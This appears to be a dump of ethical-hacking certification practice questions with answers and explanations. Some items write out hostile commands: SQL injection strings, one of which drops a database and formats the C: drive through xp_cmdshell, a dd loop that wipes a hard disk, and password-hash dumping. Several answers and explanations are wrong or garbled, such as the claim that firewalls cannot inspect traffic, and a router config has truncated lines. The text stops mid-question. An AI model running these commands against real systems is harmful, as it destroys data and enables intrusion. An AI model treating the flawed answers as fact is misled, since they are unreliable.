TCP and UDP provide transport services, but UDP was preferred, due to TCP characteristics. TCP is a complicated protocol, and it consumes a lot of memory and CPU resources. UDP is easy to build and run, and vendors have built a simple version of IP and UDP into devices including repeaters and modems.
Steven, a security analyst for XYZ associates, is analyzing packets captured by Ethereal on a
Linux server inside his network when the server starts to slow down tremendously. Steven examines the following Ethereal capture: (see graphic)

A. SYN flood
B. ARP spoofing
C. Smurf attack
D. Ping of Death
C. Smurf attack.

A perpetrator is sending a large quantity of ICMP echo traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will tak the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding.
You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an
issue, what type of scan should you run to get very reliable results?

A. Stealth scan
B. Fragmented packet scan
C. Connect scan
D. XMAS scan
C. Connect scan

A TCP Connect scan, named after the UNIX connect ( ) system call is the most accurate scanning method. If a port is open, the OS completes the TCP three-way handshake, and the port scanner immediately closes the connection.
Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to
johndoe@gmail.com". What do you think has occurred?

A. The web application picked up a record at random
B. The web application emailed the administrator about the error
C. The server error has caused the application to malfunction
D. The web application returned the first record it found
D. The web application returned the first record it found.

The web application sends a query to a SQL database and by giving it the criteria 1=1, which will always be true, it will return the first value it finds.
What file system vulnerability does the following command take advantage of?
type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe

A. Backdoor access
B. ADS
C. NTFS
D. HFS
B. ADS.

ADS (Alternate Data Stream) is a feature in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams, and the data streams are accessed by filename :stream.
Michael is the security administrator for the ABC company? Michael has been charged with strengthening the company's security policies, including its password policies.Due to certain legacy applications, Michael was only able to enforce a password group policy in Active Directory with a minimum of 10 characters.He has informed the company's employees, however, that the new password policy requires that everyone must have complex passwords with at least 14 characters.Michael wants to ensure that everyone is using complex passwords that meet the new security policy requirements. Michael has just logged on to one of the network's domain controllers
and is about to run the following command. (see graphic)
What will this command accomplish?

A. Dumps Active Directory password hashes to pwd.txt
B. Internet Cache file is piped to pwd.txt
C. Password history file is piped to pwd.txt
D. Dumps SAM password hashes to pwd.txt
D. Dumps SAM password hashes to pwd.txt.

Pwdump is a hack tool that is used to grab Windows password hashes from a remote Windows
computer. Pwdump > pwd.txt will redirect the output from pwdump to a text file named pwd.txt
June, a security analyst, understands that a polymorphic virus has the ability to mutate and can
change its known viral signature and hide from signature-based antivirus programs. Can June use
an antivirus program in this case and would it be effective against a polymorphic virus?

A. Yes. June can use an antivirus program since it compares the signatures of executable files to
the database of known viral signatures and it is very effective against a polymorphic virus
B. No. June can't use an antivirus program since it compares the signatures of executable files to
the database of known viral signatures and in the case the polymorphic viruses cannot be
detected by a signature-based anti-virus program
C. No. June can't use an antivirus program since it compares the size of executable files to the
database of known viral signatures and it is effective on a polymorphic virus
D. Yes. June can use an antivirus program since it compares the parity bit of executable files to
the database of known check sum counts and it is effective on a polymorphic virus
B. No. June can't use an antivirus program since it compares the signatures of executable files to a database of known viral signatures, and polymorphic viruses cannot be detected by a signature-based AV system.

Although there are functions like heuristic scanning and sandbox technology, the Antivirus
program is still mainly depending of signature databases and can only find already known viruses.
Which tool/utility can help you extract the application layer data from each TCP connection from a
log file into separate files?
A. argus
B. Tcpdump
C. TCPflow
D. Snort
C. TCPflow

TCPflow is a program that captures data transmitted as part of TCP connections (flows) and stores the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump' shows a summary of packets seen on the wire, but doesn't usually store the data that's actually being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in a separate file for later analysis.
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and
forward it so that the server might perform undesirable actions. Alternatively, the attacker could
pose as the server or client after a legitimate authentication and gain unauthorized access to data.
Which of the following is NOT a means that can be used to minimize or protect against such an attack?

A. Timestamps
B. File permissions
C. SMB Signing
D. Sequence numbers monitoring
A,C,D

A. Timestamps
C. SMB Signing
D. Sequence numbers
Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been
able to spawn an interactive shell and plans to deface the main web page. He first attempts to use
the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts
to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in
which also he remains unsuccessful. What is the probable cause of Bill's problem?

A. You cannot use a buffer overflow to deface a web page
B. The system is a honeypot
C. The HTML file has permissions of read only
D. There is a problem with the shell and he needs to run the attack again
C. The HTML file has permissios of read-only.
More sophisticated IDSs look for common shellcode signatures. But even these systems can be
bypassed, by using polymorphic shellcode. This is a technique common among virus writers it
basically hides the true nature of the shellcode in different disguises.
How does a polymorphic shellcode work?

A. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcode
B. They reverse the working instructions into opposite order by masking the IDS signatures
C. They convert the shellcode into Unicode, using loader to convert back to machine code then executing them
D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and
software firewalls, hardened the operating systems, and disabled all unnecessary services on all
the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of
the servers that requires the telnet service to function properly. Blake is especially concerned
about this since telnet can be a very large security risk in an organization. Blake is concerned
about how this particular server might look to an outside attacker so he decides to perform some
footprinting, scanning, and penetration tests on the server.Blake telnets into the server and types
in the following command:
HEAD / HTTP/1.0
After pressing enter twice, Blake gets the following results: (see graphic)
What has Blake just accomplished?
B. Grabbed the banner
You are sniffing an unprotected WiFI network located in a JonDonalds Cybercafe with Ethereal to
capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while
sipping brewed coffee from JonDonalds. You want to sniff their e-mail messages traversing the unprotected WiFi network. Which of the following ethereal filters will you configure to display only the packets with hotmail email
messages?
A. (http contains "e-mail") && (http contains "hotmail")
B. (http = "login.passport.com") && (http contains "SMTP")
C. (http contains "hotmail") && (http contains "Reply-To")
D. (http = "login.passport.com") && (http contains "POP3")
C. (http contains "hotmail") && (http contains "Reply-To")

Each Hotmail message contians the tag Reply-To: <sender address> and "xxxx-xxx-xxx.xxxx.hotmail.com" in the received tag.
Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the
cookie even while the session is valid on the server. Why do you think this is possible?
A. It works because encryption is performed at the application layer (single encryption key)
B. It works because encryption is performed at the network layer (layer 1 encryption)
C. Any cookie can be replayed irrespective of the session status
D. The scenario is invalid as a secure cookie cannot be replayed
A. It works because encryption is performed at the application layer (single encryption key)

Single key encryption (conventional cryptography) uses a single word or phrase as the key. The same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver initially need to have a secure way of pasing the key from one to the other. With TLS or SSL this would not be possible.
John has a proxy server on his network which caches and filters web access. He shuts down all
unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not
allow users to connect to any outbound ports. Jack, a network user has successfully connected to
a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine.
Assuming an attacker wants to penetrate John's network, which of the following options is he likely
to choose?
A. Use HTTPTunnel or Stunnel on port 80 and 443
B. Use reverse shell using FTP protocol
C. Use Monkey shell
D. Use ClosedVPN
A. Use HTTPTunnel or Stunnel on port 80 and 443.

As long as you allow http or https traffic attacks can be tunneled over those protocols with Stunnel or HTTPTunnel.
One of the most common and the best way of cracking RSA encryption is to begin to derive the
two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p
and q are discovered through a _____________ process, then the private key can be derived.
A. Hashing
B. Factorization
C. Prime detection
D. Brute-forcing
B. Factorization
Microsoft Authenticode technology is used for:

A. Digitally signing Javascript files
B. Digitally signing Java Applets
C. Digitally signing SSL certificates
D. Digitally signing ActiveX controls
D. Digitally signing ActiveX controls.

Authenticode identifies the publisher of signed software and verifies that it hasn't been tampered
with, before users download software to their PCs. As a result, end users can make a more
informed decision as to whether or not to download code. Authenticode relies on digital certificates
and is based on specifications that have been used successfully in the industry for some time,
including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10
(certificate request formats), X.509 (certificate specification), and Secure Hash Algorithm (SHA)
and MD5 hash algorithms.
What port number is used by LDAP protocol?
A. 464
B. 389
C. 110
D. 445
B. 389

AD and Exchange use LDAP via TCP port 389 for clients.
You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anything' or 1=1 " in the username field of an authentication form. This is the output returned from the server.
What is the next step to be done?

A. Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
B. Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -
reboot'; --
C. Delete the database and format the C: drive by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB;
xp_cmdshell 'format c: /q /yes '; --
D. Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
A. Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
Melissa is a virus that targeted Microsoft Windows platforms. To which category does this virus
belong?
A. Polymorphic
B. System
C. Boot Sector infector
D. Macro
D. Macro

The Melissa macrovirus propagates in the form of an e-mail message containing an infected Word document as an attachment.
Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He
wonders if his firewall has been breached. What would be your inference?

A. The attacker is using the ICMP protocol to have a covert channel
B. Eric has a Wingate package providing FTP redirection on his network
C. Somebody is using SOCKS on the network to communicate through the firewall
D. Eric's network has been penetrated by a firewall breach
C. Somebody is using SOCKS on the network to communicate through the firewall
Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign,
display, or modify ACLs (access control lists) to files or folders and that could also be used within batch files. Which of the following tools could be used for this purpose?

A. NTPERM.exe
B. PERM.exe
C. CACLS.exe
D. CLACS.exe
C. CACLS.exe

Cacls.exe (Change Access Control Lists) is an executable in Microsoft Windows to change Access
Control List (ACL) permissions on a directory, its subcontents, or files. An access control list is a list of permissions for a file or directory that controls who can access it.
What hacking attack is challenge/response authentication used to prevent?

A. Scanning attacks
B. Password cracking attacks
C. Replay attacks
D. Session hijacking attacks
C. Replay attacks

A replay attack is a form of network attack in which a valid data transmission is maliciously or
fraudulently repeated or delayed. This is carried out either by the originator or by an adversary
who intercepts the data and retransmits it. With a challenge/response authentication you ensure
that captured packets can't be retransmitted without a new authentication.
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS
option use _____ defense against buffer overflow attacks.

A. Format checking
B. Hex editing
C. Non-executing stack
D. Canary
D. Canary

Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. (Think of a canary in a coalmine)
Kevin has been asked to write a short program to gather user input for a web application. He likes
to keep his code neat and simple. His chooses to use printf(str) where he should have ideally used
printf("%s", str). What attack will his program expose the web application to?

A. Format String Attack
B. Unicode Traversal Attack
C. SQL injection Attack
D. Cross Site Scripting
A. Format String Attack

Format string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful coe. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that peform formatting, such as printf( ). A malicious user may use the %s and %x format tokens, among others, to print data form teh stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf( ) and similar functions to write back the number of bytes formatted to the same argument to printf( ), assuming that the corresponding argument exists, and is of type int* .
You have successfully run a buffer overflow attack against a default IIS installation running on a
Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you
intend to do, you need elevated permissions. You need to know what your privileges are within the
shell. What are your current privileges?

A. Administrator
B. IIS default installation account
C. IUSR_COMPUTERNAME
D. Local_System
D. LOCAL_SYSTEM

If you manage to get hte system to start a shell fo ryou, that shell will be running as LOCAL_SYSTEM
What are the differences between SSL and S-HTTP?

A. SSL operates at the transport layer and S-HTTP operates at the application layer
B. SSL operates at the application layer and S-HTTP operates at the network layer
C. SSL operates at the application layer and S-HTTP operates at the transport layer
D. SSL operates at the network layer and S-HTTP operates at the application layer
A. SSL operates at the transport layer, and S-HTTP operates at the application layer.

The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer, and mimics the "socket library" while S-HTTP operates at the application layer. Encryption of the trnasport layer allows SSL to be application-independent, while S-HTTP is llimited to the specific software implementing it. The protocols adopt different philosophies toward encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.
Dave has been assigned to test the network security of Acme Corp. The test was announced to
the employees. He created a webpage to discuss the progress of the tests with employees who
were interested in following the test. Visitors were allowed to click on a sand clock to mark the
progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the
webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?

A. The attack was deception and security was not directly compromised
B. Security was not compromised as the webpage was hosted internally
C. The attack was social engineering and the firewall did not detect it
D. The attack did not fall through as the firewall blocked the traffic
C. This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react.
_____ ensures that the enforcement of organizational security policy does not rely on voluntary
web application user compliance. It secures information by assigning sensitivity labels on
information and comparing this to the level of security a user is operating at.

A. Discretionary Access Control
B. Role-based Access Control
C. Mandatory Access Control
D. Authorized Access Control
C. Mandatory Access Control

In computer security, mandatory access control (MAC) is a kind of access control, defined by the
TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity."
Study the snort rule given:
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|";
distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00
00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin;
sid:2192; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC
ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase;
offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c
00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1;
within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|";
distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193;
rev:1;)
From the options below, choose the exploit against which this rule applies?
A. IIS Unicode
B. SQL Slammer
C. MS Blaster
D. WebDav
C. MS Blaster

MS Blaster scans the Internet for computers that are vulnerable to its attack. Once found, it tries to
enter the system through the port 135 to create a buffer overflow. TCP ports 139 and 445 may also provide attack vectors.
You have chosen a 22 character word from the dictionary as your password. How long will it take
to crack the password by an attacker?

A. 5 minutes
B. 16 million years
C. 200 years
D. 23 days
A. Five minutes. When this question was written-MAYBE five minutes. Now? Choose less time if it's an option on the exam. What kind of dumbshit uses a dictionary word?
Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the
recommendations for securing the operating system and IIS. These servers are going to run
numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is
still concerned about the security of these servers because of the potential for financial loss. Bob
has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on
ports 80 and 443 to ensure that no malicious data is getting into the network.
Why will this not be possible?

A. Firewalls cannot inspect traffic at all, they can only block or allow certain ports
B. Firewalls cannot inspect traffic coming through port 80
C. Firewalls cannot inspect traffic coming through port 443
D. Firewalls can only inspect outbound traffic
A. Firewalls cannot inspect traffic at all, they can only block or allow certain ports.

In order to really inspect traffic and traffic patterns you need an IDS.
Which of the following is a patch management utility that scans one or more computers on your network and alerts you if any important Microsoft security patches are missing. It then provides links that enable those missing patches to be downloaded and installed.

A. MBSA
B. ASNB
C. PMUS
D. BSSA
A. MBSA

The Microsoft Baseline Security Analyzer is a tool put out by Microsoft to help analyze security problems in Microsoft Windows. It does this by scanning the system for security problems in Windows, Windows components, such as the IIS we server application, Microsoft SQL server, and Microsoft Office. One example of an issue might be that permissions for one of hte directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files by outsiders.
The network administrator at Spears Technology, Inc has configured the default gateway Cisco
router's access-list as below:
Current configuration : 1206 bytes
!
version 12.3
!
hostname Victim
!
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0
!
interface Ethernet0/0
p address dhcp
p nat outside
alf-duplex
!
interface Ethernet0/1
p address 192.168.1.1 255.255.255.0
p nat inside
alf-duplex
!
router rip
etwork 192.168.1.0
!
ip nat inside source list 102 interface Ethernet0/0 overload
no ip http server
ip classless
!
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 102 permit ip any any
!
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
!
line con 0
ogging synchronous
ogin
line aux 0
line vty 0 4
assword secret
ogin
!
!
end
You are hired to conduct security testing on their network. You successfully brute-force the SNMP
community string using a SNMP crack tool. The access-list configured at the router prevents you
from establishing a successful connection.
You want to retrieve the Cisco configuration from the router. How would you proceed?
A. Run a network sniffer and capture the returned traffic with the configuration file from the router
B. Use the Cisco's TFTP default password to connect and download the configuration file
C. Send a customized SNMP set request with a spoofed source IP address in the range -
192.168.1.0
D. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router
masking your IP address
A. Run a network sniffer and capture the returned traffic with the configuration file from the router.
C. Send a customized SNMP set request with a spoofed source IP address in the range 192.168.1.0/24

SNMP is allowed only by access-list 1. Therefore, you need to spoof a 192.168.1.0/24 address and then sniff the reply from the gateway.
Why do you need to capture five to ten million packets in order to crack WEP with AirSnort?
A. All IVs are vulnerable to attack
B. Air Snort uses a cache of packets
C. Air Snort implements the FMS attack and only encrypted packets are counted
D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers
C. Air Snort implements the FMS attack and only encrypted packets are counted.

AirSnort and similar tools that implement the FMS attack require very large numbers of packets to be gathered before being able to crack a WEP key. AirSnort's site estimates the total number of packets at 5-10 millions, but this may be a conservative estimate.
Bob is conducting a password assessment for one of his clients. Bob suspects that password
policies are not in place and weak passwords are probably the norm throughout the company he is
evaluating. Bob is familiar with password weaknesses and key loggers. What are the means that
Bob can use to get password from his client hosts and servers?
A. Passwords are always best obtained using Hardware key loggers
B. Hardware and Software Keyloggers
C. Software only, they are the most effective
D. Hardware, Software, and Sniffing
D. Hardware, software and sniffing.

All loggers will work as long as he has physical access to the computers.
You just purchased the latest DELL computer, which comes pre-installed with Windows XP,
McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that
you must do before you use it.

A. Install the latest signatures for Antivirus software
B. Configure "Windows Update" to automatic
C. Create a non-admin user with a complex password and logon to this account
D. Enable "guest" account
E. Install a personal firewall and lock down unused ports from connecting to your computer
F. New installation of Windows should be patched by installing the latest service packs and
hotfixes
G. You can start using your computer since the vendor such as DELL, HP and IBM already would
have installed the latest service packs up-to-date
A. Install the latest signatures for AV software
B.Configure "Windows Update" to automatic
C. Create a non-admin user with a complex password and logon to this account
E. Install a personal firewall and lock down unused ports from connecting to your computer.
F. New installation of Windows should be patched by installing the latest service packs and hotfixes.
Study the log below and identify the scan type.
tcpdump -vv host 192.168.1.10
17:34:45.802163 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 36166)
17:34:45.802216 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 33796)
17:34:45.802266 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 47066)
17:34:46.111982 eth0 < 192.168.1.1 > victim: ip-proto-74 0 (ttl 48, id 35585)
17:34:46.112039 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 32834)
17:34:46.112092 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 26292)
17:34:46.112143 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 51058)
tcpdump -vv -x host 192.168.1.10
17:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060) 4500 0014 a44c
0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000
A. nmap S 192.168.1.10
B. nmap -sO -T 192.168.1.10
C. nmap R 192.168.1.10
D. nmap V 192.168.1.10
B. nmap -sO -T 192.168.1.10
What does the term 'Hacktivism' means?
A. Someone who is hacking for a cause
B. Someone who has at least 12 years of hacking experience
C. Someone who subscribe to hacker's magazine
D. Someone that has an urge to constantly hack
A. Hacking for a cause.
What port number is used by Kerberos protocol?
A. 419
B. 44
C. 88
D. 487
C. 88

Kerbos traffic uses UDP/TCP protocol source and destination port 88
Mark works as a contractor for the Department of Defense and is in charge of network security. He
has spent the last month securing access to his network from all possible entry points. He has
segmented his network into several subnets and has installed firewalls all over the network. He
has placed very stringent rules on all the firewalls, blocking everything in and out except ports that
must be used. He does need to have port 80 open since his company hosts a website that must
be accessed from the Internet. Mark is fairly confident of his perimeter defenses, but is still worried about programs like Hping2 that can get into a network through covert channels.

How should mark protect his network from an attacker using Hping2 to scan his internal network?
A. Block ICMP type 13 messages
B. Block all outgoing traffic on port 53
C. Use stateful inspection on the firewalls
D. Block all incoming traffic on port 53
A. Block ICMP type 13 messages.

An ICMP type 13 message is an ICMP timestamp request and waits for an ICMP timestamp reply. The remote node is right to do, still it would not be necessary as it is optional and thus many ip stacks ignore such packets. Nevertheless, nmap again archived to make its packets unique by setting the originating timestamp field in the packet to 0.
Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would
result in serious financial losses. He planned the attack carefully and carried out the attack at the
appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main
financial transaction server had been attacked. As a result of the attack, the server crashed and
Trent needed to reboot the system, as no one was able to access the resources of the company.
This process involves human interaction to fix it. What kind of Denial of Service attack was best
illustrated in the scenario above?
A. DOS attacks which involves crashing a network or system
B. DOS attacks which involves flooding a network or system
C. Simple DDOS attack
D. DOS attacks which is done accidentally or deliberately
A. DOS attacks which involve crashing a network or system.
Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured
on Web Servers.

A. True

B. False
A. True.

Using HTTP basic authentication will result in your PW being sent over the internet as clear-text. Don't use this technique unless you understand what the ramifications of this are.
Bob is very security conscious; he is about to test a site that is known to have malicious applets,
code, and more. Bob always makes use of a basic Web Browser to perform such testing. Which of
the following web browsers can adequately fill this purpose?
A. Lynx
B. Mozilla
C. Internet Explorer
D. Tiger
A. Lynx

Lynx is a program used to browse the web, which works on simple text terminals rather than requiring a graphical computer display terminal.
Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds
by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher
that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is
being followed here?
A. no authentication
B. open system authentication
C. single key authentication
D. shared key authentication
D. Shared key authentication.
Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP
Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on
that subnet respond to this broadcast. By spoofing the source IP address of the packet, all the
responses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim with
hundreds of responses for every request the hacker sends out.
Who are the primary victims of these attacks on the Internet today?
A. SPAM filters are the primary victim to smurf attacks
B. Mail servers are the primary victim to smurf attacks
C. IDS devices are the primary victim to smurf attacks
D. IRC servers are the primary victim to smurf attacks
D. IRC servers are the primary victims of smurf attacks.

IRC servers are the primary victims of smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and share them. Thus, when a victim is flooded with responses they will appear to come from all over the Internet. On IRCs hackers will use bots that connect to IRC servers and collect IP addresses. The bots then send the forged packets to the amplifiers to inundate the victim.
Bret is a web application administrator and has just read that there are a number of surprisingly
common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet.
He has also read that when an organization deploys a web application, they invite the world to
send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform
hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is
determined to weed out any vulnerabilities. What are some common vulnerabilities in web
applications that he should be concerned about?
A. No IDS configured, anonymous user account set as default, missing latest security patch, no
firewall filters set and visible clear text passwords are just a few common vulnerabilities
B. No SSL configured, anonymous user account set as default, missing latest security patch, no
firewall filters set and an inattentive system administrator are just a few common vulnerabilities
C. Visible clear text passwords, anonymous user account set as default, missing latest security
patch, no firewall filters set and no SSL configured are just a few common vulnerabilities
D. Non-validated parameters, broken access control, broken account and session management,
cross-side scripting and buffer overflows are just a few common vulnerabilities
D. Non-validated parameters, broken access control, broken account and session management, cross-side scripting and buffer overflows are just a few common vulnerabilities.
Which of the following best describes Vulnerability?
A. The loss potential of a threat
B. An action or event that might prejudice security
C. A weakness or error that can lead to a compromise
D. An agent that could take advantage of a weakness
C. A weakness or error that can lead to a compromise.

A vulnerability is a flaw or weakness in system security procedures, design or implementation that could be exercise (accidentally triggered or intentionally exploited) and result in harm to an IT system or activity.
Scanning for services is an easy job for Bob as there are so many tools available from the
Internet. In order for him to check the vulnerability of Brownies Inc., he went through a few
scanners that are currently available.
Here are the scanners that he used:
1. Axent's NetRecon (http://www.axent.com)
2. SARA, by Advanced Research Organization (http://www-arc.com/sara/)
3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/)
However, are there any other alternative ways to make sure that the services that have been
scanned will be more accurately reported and detailed for Bob? What would be the best method to
accurately identify the services running on a victim host?
A. Using a vulnerability scanner to try to probe each port to verify or figure out which service is
running for Brownies Inc.
B. Using Cheops-ng to identify the devices of Brownies Inc.
C. Using the default port and OS to make a best guess of what services are running on each port
for Brownies Inc
D. Using the manual method of telnet to each of the open ports of Brownies Inc.
D. Using the manual method of telnet to each of the open ports of Brownies, Inc.

By running a telnet connection to the open ports you will receive banners that tell you what service is answering on that specific port.
In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna
positioning. He places the antennas for the access points near the center of the building. For those
access points near the outer edge of the building he uses semi-directional antennas that face
towards the buildings center. There is a large parking lot and outlying field surrounding the building
that extends out half a mile around the building. Bob figures that with this and his placement of
antennas, his wireless network will be safe from attack. Which of the following statements is true?
A. Bob's network will be safe but only if he doesn't switch to 802.11a
B. With the 300-foot limit of a wireless signal, Bob's network is safe
C. Wireless signals can be detected from miles away; Bob's network is not safe
D. Bob's network will not be safe until he also enables WEP
C. Wireless signals can be detected from miles away. Bob's network is not safe.

It all depends on the capacity of the antenna that a potential hacker will use in order to gain access to the wireless net.
ARP poisoning is achieved in _____ steps
A. 1
B. 3
C. 2
D. 4
C. 2

The hacker begins by sending a malicious ARP reply (for which there was no previous request) to your router, associating his computer's MAC address with your IP address. Now, your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC address with the router's IP address. Now, your machine thinks the hacker's computer is your router. The hacker has now used ARP poisoning to accomplish a MITM attack.
While doing web application testing, you might be required to look through multiple web pages
online which can take a long time. Which process below would be a more efficient way of doing
this type of validation?
A. Useget utility to download all pages locally for further inspection
B. Use wget utility to download all pages locally for further inspection
C. Use mget utility to download all pages locally for further inspection
D. Use get * utility to download all pages locally for further inspection
B. Use wget utility to download all pages locally for further inspection.

Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to work there needs to be a space between get and *. get( ); is just bogus, that's a C function that's written 100% wrong. mget dis a command used from "within" ftp itself, ruling out A. Which leaves B use wget which is designed for mirroring and download files, especially webpages if used with the -R option (i.e. wget -R) it could mirror a site, all except the protected portions, of course.

GNU Wget is a free network utility to retrieve files from teh Web using FTP and HTTP, and can be used to make mirrors of archives and home pages, thus enabling work in the background after logging off.
John Beetlesman, the hacker has successfully compromised the Linux system of Angent
Telecommunications, Inc's?Webserver running Apache. He has downloaded sensitive documents
and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box
before disconnecting.
for (( i = 0;i<11;i++ )); do
?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done
What exactly is John trying to do?

A. He is making a bit stream copy of the entire hard disk for later download
B. He is deleting log files to remove his trace
C. He is infecting the hard disk with random virus strings
D. He is wiping the contents of the hard disk with zeros
D. He is wiping the contents of the hard drive with zeros.

dd copies an input file to an output file with optional conversions. -if is input fil, -of is output file. /dev/zero is a special file that provides as many null characters (ASCII NULL, ox00; not ASCII character "digit zero," "0", 0x30) as are read from it. /dev/hda is the hard drive.
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary
data storage area) than it was intended to hold. What is the most common cause of buffer
overflow in software today?
A. Bad permissions on files
B. Usage of non-standard programming languages
C. High bandwidth and large number of users
D. Bad quality assurance on software produced
D. Bad quality assurance on a software product.

Technically a buffer overflow is a problem with the program's internal implementation.
Spears Technology, Inc is a software development company located in Los Angeles, California.
They reported a breach in security, stating that its "security defenses has been breached and
exploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addresses
containing customer credit cards and passwords. Spears Technology found this attack to be so
severe that they reported the attack to the FBI for a full investigation. Spears Technology was
